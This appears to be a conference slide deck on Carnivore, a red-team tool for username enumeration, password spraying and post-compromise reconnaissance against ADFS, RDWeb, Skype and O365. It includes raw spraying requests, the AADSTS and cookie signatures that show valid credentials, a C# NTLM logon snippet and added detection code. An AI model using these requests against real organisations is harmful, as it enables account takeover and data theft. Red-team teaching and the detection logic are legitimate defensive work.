Intro Demonstration


Microsoft Attack Surface

Domain Enumeration

[Screenshot: Carnivore "Microsoft Attack Surface" grid. Columns: IP Address, Domain Name, User Enumeration URL, Password Spray URL, Federated, O365]

[Screenshot: Carnivore "Credentials" grid. Columns: O365, MFA, Service, Sip Enabled, Account Disabled, Password Expired, Server Error Authenticating, Access Token]


[18:50] Carnivore started at: 31/07/2020 18:50:41
[18:50] Output will be automatically logged to: C:\temp


Research — General Statistics

[Chart slides; the figures are not recoverable from the extracted text]

Subdomain Enumeration

Research — Subdomain Enumeration

[Chart slides; legend entry: User Enum]
Username Enumeration

Username Enumeration Demonstration

Microsoft Attack Surface

Credentials

[Screenshot: Credentials grid. Columns: Username, Password, O365, MFA, Service, Sip Enabled, Account Disabled, Password Expired, Server Error Authenticating, Access Token]


[19:07] Looking up subdomain DNS records...
[19:07] Validating subdomain records...
[19:07] No user enum or pass spray URL discovered - attempting to find NTLM endpoints...
[19:07] [*] Skype Server Hostname: nevtek-skype01.nevtek.nev
[19:07] [*] nevtek-skype01.nevtek.nev: 10.129.121.143
[19:07] Enumerating Internal Domain Information...
[19:07] OAuth Domain name: NEVTEK.NEV
[19:07] OAuth Domain name: NEVTEK.NEV
[19:07] OAuth Domain name: NEVTEK.NEV
[19:07] OAuth Domain name: NEVTEK.NEV
[19:07] Finished subdomain enumeration and validation...


Username Enumeration

* Smart Enumeration
  * 9 lists of statistically likely usernames
  * Automatically selects likely format
* Legacy vs Modern Format
  * NEVTEK\jsmith
  * jsmith@nevtek.nev


ADFS: MSIS Cookie

POST /adfs/ls/idpinitiatedsignon HTTP/1.1
Host: federated.nevtek.nev
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 85

SigninidpSite=SigninidpSite&SigninSubmit=Sign+in&SingleSignOut=SingleSignOut


ADFS: POST Request

POST /adfs/ls/idpinitiatedsignon HTTP/1.1
Host: federated.nevtek.nev
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Cookie: MSISSamlRequest=FZZVXXXXOISRW83WVIrMHhSNEtaYkJSYKIIUWxJc29m
Content-Type: application/x-www-form-urlencoded
Content-Length: 86

UserName=nevtek\jsmith&Password=Password1&AuthMethod=FormsAuthentication


ADFS: Invalid Response

(200 with the sign-in form re-rendered; only the MSISSamlRequest cookie is set, no MSISAuth session cookie)

HTTP/1.1 200 OK
Cache-Control: no-cache,no-store
Pragma: no-cache
Content-Length: 15126
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-HTTPAPI/2.0
x-frame-options: DENY
P3P: CP="ADFS doesn't have P3P policy, please contact your site's admin for more details."
Set-Cookie: MSISSamlRequest=QmFzZVVybD1odHRwcXXXW83WVIrMHh5NEtaYkJ5YkliUWxJc29mR3MIM2Qs; path=/adfs; HttpOnly; Secure
Date: Tue, 17 Dec 2019 20:16:57 GMT


ADFS: Valid Response

(302 back to the sign-on page with an MSISAuth session cookie issued)

HTTP/1.1 302 Found
Content-Length: 0
Content-Type: text/html; charset=utf-8
Location: https://federated.nevtek.nev:443/adfs/ls/idpinitiatedsignon
Server: Microsoft-HTTPAPI/2.0
P3P: CP="ADFS doesn't have P3P policy, please contact your site's admin for more details."
Set-Cookie: MSISSamlRequest=QmFzZVVybD1o0dHXXXXiUWxJc29mR3MIM20=; path=/adfs; HttpOnly; Secure
Set-Cookie: MSISAuth=AAEAAAjGUXaZwZj5rCLwZnX/MVCa0X+XXXXXX+EMO7ic2AVAjmFgoYXxLFuUzh/Y8DBR5v0gHY+x; path=/adfs; HttpOnly; Secure
Date: Tue, 17 Dec 2019 20:16:34 GMT


RDWeb: POST Request

POST /RDWeb/Pages/en-US/login.aspx HTTP/1.1
Host: remote.nevtek.nev
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

DomainUserName=nevtek\cscott&UserPass=Password1


RDWeb: Invalid Response

(200 with the login page re-rendered; TSWAAuthHttpOnlyCookie is cleared with an expiry in the past)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
Set-Cookie: TSWAAuthClientSideCookie=Name=nevtek%5Cjsmith&MachineType=public&WorkSpaceID=; expires=Tue, 12-Sep-2017 17:16:34 GMT; path=/; secure
Set-Cookie: TSWAAuthHttpOnlyCookie=; expires=Mon, 11-Oct-1999 23:00:00 GMT; path=/; secure; HttpOnly; SameSite=Lax
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 08 Jun 2020 17:16:34 GMT
Connection: close
Content-Length: 13124


RDWeb: Valid Response

(302 to default.aspx with a populated TSWAAuthHttpOnlyCookie session cookie)

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /RDWeb/Pages/en-US/default.aspx
Server: Microsoft-IIS/8.5
Set-Cookie: TSWAAuthClientSideCookie=Name=nevtek%5Ccscott&MachineType=public&WorkSpaceID=; path=/; secure
Set-Cookie: TSWAAuthHttpOnlyCookie=A6C95DE1EB8443D6CXXXX6E51C36ABF9; path=/; secure; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 08 Jun 2020 17:16:57 GMT
Connection: close
Content-Length: 148


Password Spraying

* Discovered Format
* Pre-built lists


Password Spraying Demonstration

Microsoft Attack Surface

[Screenshot: username list file loaded: username list.txt]

Credentials

[Screenshot: Credentials grid. Columns: Username, Password, O365, MFA, Service, Sip Enabled, Account Disabled, Password Expired, Server Error Authenticating, Access Token]

Output
[19:24] Looking up subdomain DNS records...
[19:24] Validating subdomain records...
[19:24] No user enum or pass spray URL discovered - attempting to find NTLM endpoints...
[19:24] [*] Skype Server Hostname: nevtek-skype01.nevtek.nev
[19:24] [*] nevtek-skype01.nevtek.nev: 10.129.121.143
[19:25] Enumerating Internal Domain Information...
[19:25] OAuth Domain name: NEVTEK.NEV
[19:25] OAuth Domain name: NEVTEK.NEV
[19:25] OAuth Domain name: NEVTEK.NEV
[19:25] OAuth Domain name: NEVTEK.NEV
[19:25] Finished subdomain enumeration and validation...

Password Spraying

[Screenshot: Credentials grid after the spray; columns as above. Rows as far as legible:]
Username       | Password   | Service | Access Token
NEVTEK\jsmith  | Summer2019 | Skype   | cwt=AAEBHAEFAAAAAAAFFC
NEVTEK\msmith  |            | Skype   |
NEVTEK\skumar  |            | Skype   |
NEVTEK\johnson |            | Skype   |


Research — Password Spraying

[Endpoints observed per service; the numbers are reproduced as shown on the slide]

Exchange:
/Autodiscover
/ews
/autodiscover/autodiscover.xml
/rpc
/oab
/mapi

Skype:
/WebTicket/oauthtoken
/WebTicket/WebTicketService.svc
/abs/
/CertProv
/RgsClients
/WebTicket/
/Autodiscover

ADFS:
/adfs/ls/idpinitiatedsignon 2196
/adfs/services/trust/2005/windowstransport 86

RDWeb:
/RDWeb/Pages/en-US/login.aspx 184
/Rpc 180
/RDWeb/FeedLogin 3
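Added example, not part of this deck or the Carnivore project: detection logic for the on-premises logon endpoints listed above, built on the signal the ADFS and RDWeb exchanges show (a failed form logon is answered with 200 and the form re-rendered, a successful one with 302 and a session cookie). It assumes access logs reduced to the fields date, time, c-ip, cs-method, cs-uri-stem and sc-status; the log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Logon endpoints from the table above, lower-cased for matching. A burst of
# POSTs to these that are almost all 200 (form re-rendered) rather than 302
# (redirect with session cookie) from one source is the spray signature.
LOGIN_ENDPOINTS = {
    "/adfs/ls/idpinitiatedsignon",
    "/adfs/services/trust/2005/windowstransport",
    "/rdweb/pages/en-us/login.aspx",
    "/rdweb/feedlogin",
}

# Assumed (reduced) log shape: "date time c-ip cs-method cs-uri-stem sc-status"
LOG_RE = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<ip>\S+) "
                    r"(?P<method>\S+) (?P<uri>\S+) (?P<status>\d{3})$")

# Constructed sample: one source posts 12 times in under a minute (11 failures,
# one success); a second source logs in normally once.
SAMPLE_LOG = [
    f"2020-06-08 17:00:{i * 5:02d} 203.0.113.10 POST /adfs/ls/idpinitiatedsignon "
    f"{200 if i < 11 else 302}" for i in range(12)
] + [
    "2020-06-08 17:05:00 198.51.100.7 POST /RDWeb/Pages/en-US/login.aspx 302",
    "2020-06-08 17:05:01 198.51.100.7 GET /RDWeb/Pages/en-US/default.aspx 200",
]

def parse_line(line):
    """Return a dict for a well-formed line, or None for anything else."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return {"ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), "ip": m["ip"],
            "method": m["method"], "uri": m["uri"].lower(), "status": int(m["status"])}

def find_spray_sources(lines, window_s=600, min_attempts=10, min_fail_ratio=0.9):
    """Map source IP -> (posts, failures) for the first window_s-second window in
    which that IP sent >= min_attempts logon POSTs, >= min_fail_ratio of them 200."""
    by_ip = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and ev["method"] == "POST" and ev["uri"] in LOGIN_ENDPOINTS:
            by_ip[ev["ip"]].append((ev["ts"], ev["status"]))
    flagged = {}
    for ip, events in by_ip.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            win = [s for t, s in events[i:] if (t - start).total_seconds() <= window_s]
            fails = sum(1 for s in win if s == 200)
            if len(win) >= min_attempts and fails / len(win) >= min_fail_ratio:
                flagged[ip] = (len(win), fails)
                break
    return flagged
```

The single 302 inside the flagged burst is the account whose password was guessed, so the source's successes, not only its failures, are what to act on.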


Password Spraying — C# NTLM Auth Spraying

using System;
using System.IO;
using System.Net;
using System.Text;

// Single NTLM authentication attempt against an HTTP endpoint; url, username and
// password are supplied by the caller. The framework performs the NTLM handshake
// from the NetworkCredential; a rejected logon (401) surfaces as a WebException.
HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url);
request.Credentials = new NetworkCredential(username, password);
request.Method = "GET";
try
{
    // A non-error status means the credentials were accepted
    HttpWebResponse response = (HttpWebResponse)request.GetResponse();
    Stream receiveStream = response.GetResponseStream();
    StreamReader readStream = new StreamReader(receiveStream, Encoding.UTF8);
    string responseString = readStream.ReadToEnd();
    Console.WriteLine("RESPONSE: " + responseString);
}
catch (WebException webex)
{
    // Error statuses land here; the status code on the response distinguishes
    // a bad password (401) from a server error
    HttpWebResponse response2 = webex.Response as HttpWebResponse;
}


A Note on Different Services

* ADFS Portal
  * Single sign on to third party services
  * Can lead to compromise of systems they might not be aware of
  * If O365 AND Federated = WIN!
* RDWeb - Remote desktop through the web


Post Compromise — Address List - Demonstration

Microsoft Attack Surface

[Screenshot: address list grid. Columns: Name, Sip Username, Email Address, Title, Department, Office, Presence, Phone Number, Note]

Credentials

[Screenshot: Credentials grid. Columns: Username, Password, O365, MFA, Service, Sip Enabled, Account Disabled, Password Expired, Server Error Authenticating, Access Token; the row values (jjohnson@NEVTEK.NEV and a Skype row with a Summer... password and access token) are not legible in the extracted text]

[19:25] OAuth Domain name: NEVTEK.NEV
[19:25] OAuth Domain name: NEVTEK.NEV
[19:25] Finished subdomain enumeration and validation...
[19:26] Password Spraying will add Domain information to given usernames in the following order:
[19:26] Domain given with username > Manually entered domain information > Domain information gathered for specified service > Domain information gathered for any surface > Fail
[19:26] "Legacy format" usernames may contain numbers, or be linked to payroll ID (jsmith945 or PT32423432423423234) and therefore not be discoverable by Smart Enumeration, however, the modern format is more likely to match email style (jsmith@domain.com or john.smith@domain.com)...
[19:26] Adding new service interface with service: Skype
[19:26] Usernames to spray: 48705
[19:26] [$] Account Disabled: jjohnson@NEVTEK.NEV
[19:27] [!] Valid Credentials: cscott@NEVTEK.NEV:Summer2020
[19:37] [*] Password spraying stopped at...


Post Compromise — Address List

[Screenshot: address list grid; rows as far as legible]
Name          | Sip Username        | Email Address            | Title                           | Department | Office | Presence         | Phone Number  | Note
Clark Scott   | cscott@nevtek.nev   | clark.scott@nevtek.nev   | Compliance and Training Officer | HR         | Leeds  | Offline, Unknown | +447789155655 | keep thinking about: 5
Daisy Johnson | djohnson@nevtek.nev | daisy.johnson@nevtek.nev | Head of HR                      | HR         | Leeds  | None, Unknown    | +447789568556 |
James Brown   |                     |                          |                                 |            |        |                  |               |
Jack Miller   |                     |                          |                                 |            |        |                  |               |


Post Compromise — Address List

* PeopleSearch
  * A-Z
  * No "next"
  * Absolute insanity
* Digraphs/Trigraphs
  * Common
  * All


Post Compromise — WebApp Proxy

* Jumping a misconfigured WebApp proxy


Post Compromise — Meeting Snooper

Microsoft Attack Surface

[Screenshot: meeting grid. Columns: Username, Conference ID, Subject, Attendees, Meeting Ends, Join URL, Lobby Bypass]

Credentials

[Screenshot: Credentials grid. Columns: Username, O365, MFA, Service, Sip Enabled, Account Disabled, Password Expired, Server Error Authenticating]

[17:33] Internal : [redacted]
[17:33] Manchester : +44 [redacted]
[17:33] London : +44 [redacted]
[17:33] Australia : +[redacted]
[17:33] Denmark : [redacted]

Global Verbosity Level: 2 - Normal

Microsoft Attack Surface

[Screenshot: meeting grid row. Username and Conference ID redacted; Subject: Test Recurring Meetings; Meeting Ends: 26 December 2020 00:00:00; Join URL: sip: (redacted); Lobby Bypass: Enabled]

Post Compromise - MeetingSnooperTM

* Self-scheduled meetings
* Meeting END time only

O365


O365 - General

* Federated
  * Cannot spray office portal
  * ADFS server location in response
* Not Federated
  * Spray office portal
  * Valid+MFA
  * Password Spray Countermeasures
* O365 — Robust!
  * Trusted vs Untrusted bad password count


Federated: Request

GET /common/userrealm/?user=username@contoso.com&api-version=2.1&checkForMicrosoftAccount=true HTTP/1.1
Host: login.microsoftonline.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


Federated: Response

{
  "MicrosoftAccount": 1,
  "IsMicrosoftAccountSet": true,
  "NameSpaceType": "Managed",
  "Login": "username@contoso.com",
  "DomainName": "contoso.com",
  "FederationBrandName": "Contoso, Ltd",
  "TenantBrandingInfo": null,
  "cloud_instance_name": "microsoftonline.com"
}


Password Spraying: Request

POST /organizations/oauth2/v2.0/token HTTP/1.1
Host: login.microsoftonline.com
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

username=user.name@contoso.com&password=Password1&client_id=randomid&scope=whatevs


Password Spraying: Invalid Password Response

{
  "error": "invalid_grant",
  "error_description": "AADSTS50126: Invalid username or password.\r\nTrace ID: XXXX\r\nCorrelation ID: XXX\r\nTimestamp: 2019-10-10 16:00Z"
}

Password Spraying: Invalid Username Response

{
  "error": "invalid_grant",
  "error_description": "AADSTS50034: The user account {EmailHidden} does not exist in the contoso.com directory. To sign into this application, the account must be added to the directory.\r\nTrace ID: XXX\r\nCorrelation ID: XXX\r\nTimestamp: 2019-10-10 14:24:00Z"
}

Password Spraying: Valid User + Password — No MFA

{
  "error": "unauthorized_client",
  "error_description": "AADSTS700016: Application with identifier 'randomid' was not found in the directory 'contoso.com'. This can happen if the application has not been installed by the administrator of the tenant or consented to by any user in the tenant. You may have sent your authentication request to the wrong tenant.\r\nTrace ID: XXX\r\nCorrelation ID: XX\r\nTimestamp: 2020-06-11 14:57:00Z"
}

Password Spraying: Valid User + Password - MFA

{
  "error": "invalid_grant",
  "error_description": "AADSTS50076: Due to a configuration change made by your administrator, or because you moved to a new location, you must use multi-factor authentication to access '00000XXXXX0000000'.\r\nTrace ID: XXXX\r\nCorrelation ID: XXXX\r\nTimestamp: 2020-06-11 14:49:15Z"
}
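Added example, not from this deck or the Carnivore project: triage of Azure AD sign-in events using the AADSTS codes shown in the four responses above. It separates a spray (many distinct existing users, one or two bad-password failures each) from username enumeration (a run of AADSTS50034 for accounts that do not exist) and lists the accounts whose password was accepted (AADSTS50076, AADSTS700016 or a success) so they can be reset. The event tuples are constructed.

```python
from collections import Counter, defaultdict

# What each AADSTS code in the responses above tells the caller.
AADSTS = {
    "50126": "bad_password",   # account exists, password wrong
    "50034": "no_such_user",   # account not in the tenant directory
    "50076": "valid_mfa",      # password accepted, MFA now required
    "700016": "valid_nomfa",   # password accepted; the bogus client_id is rejected afterwards
    "0": "success",
}

# Constructed sign-in events (source_ip, username, AADSTS code); not real data.
SAMPLE_EVENTS = (
    [("203.0.113.10", f"user{i}@contoso.com", "50126") for i in range(15)]
    + [("203.0.113.10", f"ghost{i}@contoso.com", "50034") for i in range(5)]
    + [("203.0.113.10", "cscott@contoso.com", "700016")]
    + [("198.51.100.7", "alice@contoso.com", "50126")] * 3
    + [("198.51.100.7", "alice@contoso.com", "0")]
)

def classify(code):
    """Map an AADSTS code (int or str) to the outcome it reveals."""
    return AADSTS.get(str(code), "other")

def profile_sources(events, min_users=10, max_per_user=2, min_ghosts=5):
    """Per source IP: spray = at least min_users distinct existing users with at
    most max_per_user bad-password tries each; enumeration = min_ghosts or more
    non-existent accounts probed; credential_hits = accounts whose password was
    accepted (valid_mfa, valid_nomfa or success), which need a reset."""
    by_ip = defaultdict(list)
    for ip, user, code in events:
        by_ip[ip].append((user, classify(code)))
    report = {}
    for ip, evs in by_ip.items():
        tries = Counter(u for u, c in evs if c == "bad_password")
        ghosts = sum(1 for _, c in evs if c == "no_such_user")
        hits = sorted({u for u, c in evs if c in ("valid_mfa", "valid_nomfa", "success")})
        report[ip] = {
            "spray": len(tries) >= min_users and max(tries.values(), default=0) <= max_per_user,
            "enumeration": ghosts >= min_ghosts,
            "credential_hits": hits,
        }
    return report
```

A normal user retrying a mistyped password (198.51.100.7 above) stays unflagged because the failures concentrate on one account rather than spreading across many.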


Outro

Information

* https://github.com/ReverendThing/Carnivore


